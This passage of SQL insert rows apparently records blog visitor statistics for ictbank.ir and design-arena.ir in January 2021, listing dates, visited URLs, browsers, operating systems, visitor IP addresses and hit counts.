(8082,'2021-01-14','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.235.223.128','000',0,1,0),
(8083,'2021-01-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.180.62.145','000',0,2,0),
(8084,'2021-01-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.8.91.58','000',0,2,0),
(8085,'2021-01-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8086,'2021-01-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','194.127.172.77','000',0,4,0),
(8087,'2021-01-14','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Opera','Windows','10.0',NULL,NULL,'','185.104.187.118','000',0,2,0),
(8088,'2021-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8089,'2021-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(8090,'2021-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8091,'2021-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8092,'2021-01-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.199.238.64','000',0,2,0),
(8093,'2021-01-14','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','104.248.236.204','000',0,1,0),
(8094,'2021-01-15','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','191.116.26.120','000',0,1,0),
(8095,'2021-01-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(8096,'2021-01-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','116.226.169.222','000',0,3,0),
(8097,'2021-01-15','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','84.17.62.231','000',0,2,0),
(8098,'2021-01-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.165.206.173','000',0,12,0),
(8099,'2021-01-15','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','188.13.122.139','000',0,2,0),
(8100,'2021-01-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.220.100.241','000',0,1,0),
(8101,'2021-01-15','http://ictbank.ir/blog/wp-comments-post.php','Android Browser','Android','1.5',NULL,NULL,'','220.181.77.162','000',0,2,0),
(8102,'2021-01-15','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','185.104.187.118','000',0,2,0),
(8103,'2021-01-15','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','120.85.111.5','000',0,1,0),
(8104,'2021-01-15','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','217.138.192.100','000',0,2,0),
(8105,'2021-01-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8106,'2021-01-15','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','89.238.185.116','000',0,2,0),
(8107,'2021-01-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.178','000',0,1,0),
(8108,'2021-01-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.71.197','000',0,1,0),
(8109,'2021-01-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.146','000',0,1,0),
(8110,'2021-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.217','000',0,1,0),
(8111,'2021-01-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','45.32.184.31','000',0,2,0),
(8112,'2021-01-15','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','213.232.87.126','000',0,2,0),
(8113,'2021-01-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8114,'2021-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.191.124.152','000',0,1,0),
(8115,'2021-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.220.101.216','000',0,1,0),
(8116,'2021-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.220.102.6','000',0,1,0),
(8117,'2021-01-15','http://ictbank.ir/blog','Android Browser','Android','2.2.1',NULL,NULL,'','77.81.139.228','000',0,2,0),
(8118,'2021-01-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.51.216','000',0,1,0),
(8119,'2021-01-15','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.238.84.125','000',0,1,0),
(8120,'2021-01-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.124.218','000',0,1,0),
(8121,'2021-01-15','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','114.43.181.225','000',0,1,0),
(8122,'2021-01-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.240.57.220','000',0,2,0),
(8123,'2021-01-15','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','223.204.237.25','000',0,2,0),
(8124,'2021-01-15','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','165.231.33.188','000',0,2,0),
(8125,'2021-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.128.254.37','000',0,1,0),
(8126,'2021-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(8127,'2021-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(8128,'2021-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(8129,'2021-01-15','http://ictbank.ir/blog','Facebook','iOS','12.3.2',NULL,NULL,'','37.120.203.204','000',0,2,0),
(8130,'2021-01-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(8131,'2021-01-16','http://ictbank.ir/blog','UC Browser','Series60','3',NULL,NULL,'','193.56.252.100','000',0,2,0),
(8132,'2021-01-16','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.242.118.1','000',0,1,0),
(8133,'2021-01-16','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.102.144.121','000',0,1,0),
(8134,'2021-01-16','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','141.98.102.252','000',0,2,0),
(8135,'2021-01-16','http://ictbank.ir/blog','Safari','iOS','12.4',NULL,NULL,'','89.45.60.219','000',0,1,0),
(8136,'2021-01-16','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','213.232.87.122','000',0,2,0),
(8137,'2021-01-16','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','85.254.72.26','000',0,2,0),
(8138,'2021-01-16','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','94.229.75.84','000',0,2,0),
(8139,'2021-01-16','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','188.190.221.242','000',0,2,0),
(8140,'2021-01-16','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','37.120.203.164','000',0,2,0),
(8141,'2021-01-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.108.56','000',0,1,0),
(8142,'2021-01-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8143,'2021-01-16','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','202.78.232.138','000',0,1,0),
(8144,'2021-01-16','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','39.35.24.134','000',0,2,0),
(8145,'2021-01-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.38.50.235','000',0,1,0),
(8146,'2021-01-16','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','178.17.167.172','000',0,2,0),
(8147,'2021-01-16','https://www.google.com/','Chrome','Android','10',NULL,NULL,'','94.66.45.160','000',0,1,0),
(8148,'2021-01-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.117.201','000',0,1,0),
(8149,'2021-01-16','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','185.17.27.121','000',0,2,0),
(8150,'2021-01-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8151,'2021-01-16','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','114.215.184.51','000',0,2,0),
(8152,'2021-01-16','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.91.138.189','000',0,1,0),
(8153,'2021-01-16','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','185.236.42.21','000',0,2,0),
(8154,'2021-01-16','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.168.210','000',0,1,0),
(8155,'2021-01-16','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','159.65.24.22','000',0,7,0),
(8156,'2021-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.7.193','000',0,1,0),
(8157,'2021-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8158,'2021-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(8159,'2021-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8160,'2021-01-16','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','78.108.97.55','000',0,1,0),
(8161,'2021-01-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.36','000',0,4,0),
(8162,'2021-01-17','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','63.34.163.113','000',0,1,0),
(8163,'2021-01-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','65.60.11.210','000',0,1,0),
(8164,'2021-01-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8165,'2021-01-17','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','117.6.255.104','000',0,2,0),
(8166,'2021-01-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8167,'2021-01-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.174.62','000',0,1,0),
(8168,'2021-01-17','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.14.71.116','000',0,1,0),
(8169,'2021-01-17','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','185.110.131.99','000',0,1,0),
(8170,'2021-01-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.23','000',0,2,0),
(8171,'2021-01-17','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.19.238.189','000',0,1,0),
(8172,'2021-01-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.57.200','000',0,1,0),
(8173,'2021-01-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.146.34','000',0,1,0),
(8174,'2021-01-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','178.62.126.4','000',0,1,0),
(8175,'2021-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(8176,'2021-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(8177,'2021-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,2,0),
(8178,'2021-01-17','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','23.154.160.217','000',0,2,0),
(8179,'2021-01-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.153.151.43','000',0,2,0),
(8180,'2021-01-17','http://design-arena.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','116.193.219.111','000',0,2,0),
(8181,'2021-01-17','http://design-arena.ir/blog','Safari','iOS','10.0',NULL,NULL,'','54.191.206.132','000',0,1,0),
(8182,'2021-01-17','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','217.244.136.7','000',0,2,0),
(8183,'2021-01-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.3.220.73','000',0,1,0),
(8184,'2021-01-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.70.114','000',0,1,0),
(8185,'2021-01-18','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','195.181.170.195','000',0,2,0),
(8186,'2021-01-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8187,'2021-01-18','http://ictbank.ir/blog','Facebook','iOS','12.3.1',NULL,NULL,'','185.236.42.103','000',0,2,0),
(8188,'2021-01-18','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','213.232.87.126','000',0,2,0),
(8189,'2021-01-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','99.79.71.103','000',0,3,0),
(8190,'2021-01-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(8191,'2021-01-18','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','89.238.185.116','000',0,2,0),
(8192,'2021-01-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.40.192','000',0,1,0),
(8193,'2021-01-18','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','185.95.103.28','000',0,1,0),
(8194,'2021-01-18','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','185.128.25.236','000',0,2,0),
(8195,'2021-01-18','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','103.146.36.8','000',0,2,0),
(8196,'2021-01-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.86.51.146','000',0,1,0),
(8197,'2021-01-18','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','194.36.108.76','000',0,2,0),
(8198,'2021-01-18','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','188.34.204.204','000',0,1,0),
(8199,'2021-01-18','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.16.159.12','000',0,1,0),
(8200,'2021-01-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.24.219','000',0,1,0),
(8201,'2021-01-18','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.92.75.129','000',0,1,0),
(8202,'2021-01-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.155.122','000',0,1,0),
(8203,'2021-01-18','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','89.36.224.244','000',0,2,0),
(8204,'2021-01-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8205,'2021-01-18','https://www.google.com/','Safari','OS X','10.15.6',NULL,NULL,'','82.136.68.6','000',0,1,0),
(8206,'2021-01-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(8207,'2021-01-18','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','51.158.24.101','000',0,2,0),
(8208,'2021-01-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(8209,'2021-01-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8210,'2021-01-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,2,0),
(8211,'2021-01-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.88.141.211','000',0,2,0),
(8212,'2021-01-18','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','185.220.70.201','000',0,2,0),
(8213,'2021-01-18','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.151.58.113','000',0,2,0),
(8214,'2021-01-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8215,'2021-01-19','http://ictbank.ir/blog','UC Browser','iOS','12.1',NULL,NULL,'','185.128.25.236','000',0,2,0),
(8216,'2021-01-19','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','192.144.148.220','000',0,1,0),
(8217,'2021-01-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','172.255.48.130','000',0,1,0),
(8218,'2021-01-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,2,0),
(8219,'2021-01-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.200.228','000',0,1,0),
(8220,'2021-01-19','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','165.231.33.124','000',0,2,0),
(8221,'2021-01-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.120.238','000',0,1,0),
(8222,'2021-01-19','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','86.105.9.12','000',0,2,0),
(8223,'2021-01-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','175.118.28.254','000',0,1,0),
(8224,'2021-01-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8225,'2021-01-19','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','143.177.33.196','000',0,1,0),
(8226,'2021-01-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.12.223.228','000',0,2,0),
(8227,'2021-01-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(8228,'2021-01-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.97.124','000',0,1,0),
(8229,'2021-01-19','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','49.235.151.3','000',0,2,0),
(8230,'2021-01-19','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','212.102.48.76','000',0,2,0),
(8231,'2021-01-19','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.52.150','000',0,15,0),
(8232,'2021-01-19','http://ictbank.ir/blog','Chrome','Windows','5.2',NULL,NULL,'','180.95.238.206','000',0,1,0),
(8233,'2021-01-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(8234,'2021-01-22','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','178.159.37.24','000',0,1,0),
(8235,'2021-01-22','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','89.249.64.164','000',0,2,0),
(8236,'2021-01-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(8237,'2021-01-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.88','000',0,2,0),
(8238,'2021-01-22','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','171.34.179.70','000',0,1,0),
(8239,'2021-01-23','http://ictbank.ir/blog','Android Browser','Android','3.1',NULL,NULL,'','194.127.172.68','000',0,2,0),
(8240,'2021-01-23','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(8241,'2021-01-23','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','77.243.191.44','000',0,2,0),
(8242,'2021-01-23','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.233.182.133','000',0,1,0),
(8243,'2021-01-23','http://ictbank.ir/blog','Internet Explorer','Windows','10.0',NULL,NULL,'','77.81.191.198','000',0,2,0),
(8244,'2021-01-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','152.136.104.225','000',0,3,0),
(8245,'2021-01-23','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','82.102.18.110','000',0,2,0),
(8246,'2021-01-23','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','5.180.62.70','000',0,3,0),
(8247,'2021-01-23','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','20.55.74.2','000',0,24,0),
(8248,'2021-01-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','2.179.164.109','000',0,1,0),
(8249,'2021-01-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(8250,'2021-01-23','http://design-arena.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','88.128.88.202','000',0,2,0),
(8251,'2021-01-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8252,'2021-01-23','http://ictbank.ir/blog','Instagram','Android','8.0.0',NULL,NULL,'','62.210.11.185','000',0,2,0),
(8253,'2021-01-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.149.42','000',0,1,0),
(8254,'2021-01-23','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.36','000',0,4,0),
(8255,'2021-01-23','https://www.google.co.kr/','Chrome','Windows','10.0',NULL,NULL,'','121.137.81.177','000',0,1,0),
(8256,'2021-01-23','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.28.200','000',0,1,0),
(8257,'2021-01-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','141.98.10.217','000',0,1,0),
(8258,'2021-01-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.192.111','000',0,1,0),
(8259,'2021-01-23','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','104.192.0.198','000',0,1,0),
(8260,'2021-01-23','https://www.google.com/','Chrome','Android','10',NULL,NULL,'','79.32.245.74','000',0,1,0),
(8261,'2021-01-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.206.183.82','000',0,2,0),
(8262,'2021-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(8263,'2021-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8264,'2021-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8265,'2021-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(8266,'2021-01-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.181.60.39','000',0,1,0),
(8267,'2021-01-23','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.136.206','000',0,1,0),
(8268,'2021-01-23','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','45.152.181.36','000',0,2,0),
(8269,'2021-01-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.53.220.55','000',0,3,0),
(8270,'2021-01-23','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','5.180.62.94','000',0,2,0),
(8271,'2021-01-23','http://design-arena.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','88.242.133.181','000',0,2,0),
(8272,'2021-01-24','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.254.96.208','000',0,1,0),
(8273,'2021-01-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','193.37.255.114','000',0,1,0),
(8274,'2021-01-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.99.172.138','000',0,2,0),
(8275,'2021-01-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.101.136.148','000',0,2,0),
(8276,'2021-01-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,6,0),
(8277,'2021-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(8278,'2021-01-24','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','54.233.160.83','000',0,1,0),
(8279,'2021-01-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','82.221.105.7','000',0,1,0),
(8280,'2021-01-24','http://ictbank.ir/blog','Unknown','Android','5.1',NULL,NULL,'','185.230.127.4','000',0,2,0),
(8281,'2021-01-24','http://ictbank.ir/blog','Android Browser','Android','4.3',NULL,NULL,'','185.232.23.44','000',0,2,0),
(8282,'2021-01-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.26.176','000',0,1,0),
(8283,'2021-01-24','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.185.10','000',0,1,0),
(8284,'2021-01-24','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','185.59.221.44','000',0,2,0),
(8285,'2021-01-24','http://design-arena.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','116.58.243.103','000',0,2,0),
(8286,'2021-01-24','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','18.231.169.246','000',0,1,0),
(8287,'2021-01-24','http://ictbank.ir/blog','Chrome','OS X','10.14.5',NULL,NULL,'','3.215.177.184','000',0,1,0),
(8288,'2021-01-24','http://ictbank.ir/blog','Unknown','Android','8.0.0',NULL,NULL,'','194.127.172.68','000',0,2,0),
(8289,'2021-01-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.71.207','000',0,1,0),
(8290,'2021-01-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(8291,'2021-01-24','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','217.138.192.100','000',0,2,0),
(8292,'2021-01-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.95.105.208','000',0,2,0),
(8293,'2021-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(8294,'2021-01-24','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','193.36.116.153','000',0,2,0),
(8295,'2021-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(8296,'2021-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.93.235','000',0,1,0),
(8297,'2021-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(8298,'2021-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(8299,'2021-01-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','185.212.171.196','000',0,2,0),
(8300,'2021-01-24','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','6.1',NULL,NULL,'','185.104.187.117','000',0,2,0),
(8301,'2021-01-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','216.245.218.234','000',0,1,0),
(8302,'2021-01-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','212.102.48.73','000',0,2,0),
(8303,'2021-01-25','http://ictbank.ir/blog','Safari','iOS','11.4',NULL,NULL,'','15.228.28.200','000',0,1,0),
(8304,'2021-01-25','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','185.128.26.52','000',0,2,0),
(8305,'2021-01-25','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','5.188.62.76','000',0,1,0),
(8306,'2021-01-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.119','000',0,1,0),
